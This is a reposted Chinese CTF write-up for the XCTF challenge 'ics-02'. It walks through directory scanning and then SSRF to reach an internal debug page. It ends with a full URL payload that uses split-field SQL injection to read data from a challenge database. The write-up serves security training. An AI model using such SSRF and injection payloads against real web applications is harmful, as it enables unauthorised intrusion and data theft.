ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

攻防世界--ics-02

2022-01-06 21:32:20  阅读:330  来源: 互联网

标签:02 name -- debug secret ics php 页面


初始页面,看到这种页面就比较头疼,无从下手

先来扫下目录

download会让我们下载一个ssrf的pdf文件

secret目录下包含着secret.php和secret_debug.php

login页面显示

paper下的超链接​​​​​​​

 再回头来看secret.php

当都选择第一项是可以跳转到私密页面2

随便填,注册成功,根据注释提示,结合之前的信息基本可以确定是通过SSRF去访问secret_debug.php了。 ​​​​​​​

 由于出现特殊符号会被截断,如

所以这里使用url编码,然后测试txtfirst_name这里存在注入 ,由于这里并不能直接回显,所以要错位到回显位置

payload:

?dl=http://127.0.0.1/secret/secret_debug.php?s=3&txtfirst_name=A','2',(这里填入sql语句如:database())from(cetcYssrf)),'3'/*&txtmiddle_name=mm&txtLast_name=fm&txtname_suffix=dm&txtdob=*/,'01/10/2022&txtdl_nmbr=2&txtRetypeDL=2&btnContinue2=Continue 

注意:每次提交测试都要更改参数的值,否则会报错。

参考文章:
攻防世界 ics-02 writeup 学习 - Zhu013 - 博客园
​​​​​​​xctf ics-02_old汪的博客-CSDN博客 

 

 

标签:02,name,--,debug,secret,ics,php,页面
来源: https://blog.csdn.net/qq_46263951/article/details/122349797

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有